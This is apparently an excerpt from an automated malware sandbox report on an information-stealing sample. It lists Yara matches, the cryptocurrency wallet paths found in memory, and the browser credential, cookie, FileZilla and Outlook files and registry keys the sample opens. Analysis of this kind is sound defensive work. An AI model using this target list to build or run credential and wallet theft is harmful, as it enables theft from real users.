Source: Yara match File source: 00000022.00000002.3056135980.00000000025CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 8016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 6648, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: passphrase.json
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: Ethereum
Source: file.exe String found in binary or memory: file__0.localstorage
Source: file.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: bdb44f72d9.exe, 0000001B.00000002.3241111543.0000000000372000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: bdb44f72d9.exe, 0000001B.00000002.3266173566.0000000001BE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XPP<R
Source: bdb44f72d9.exe, 00000017.00000002.3267274655.0000000001D82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XPU
Source: Yara match File source: 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000022.00000002.3056135980.00000000025CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 8016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 624f4d727e.exe PID: 6648, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C790C40 sqlite3_bind_zeroblob, 0_2_6C790C40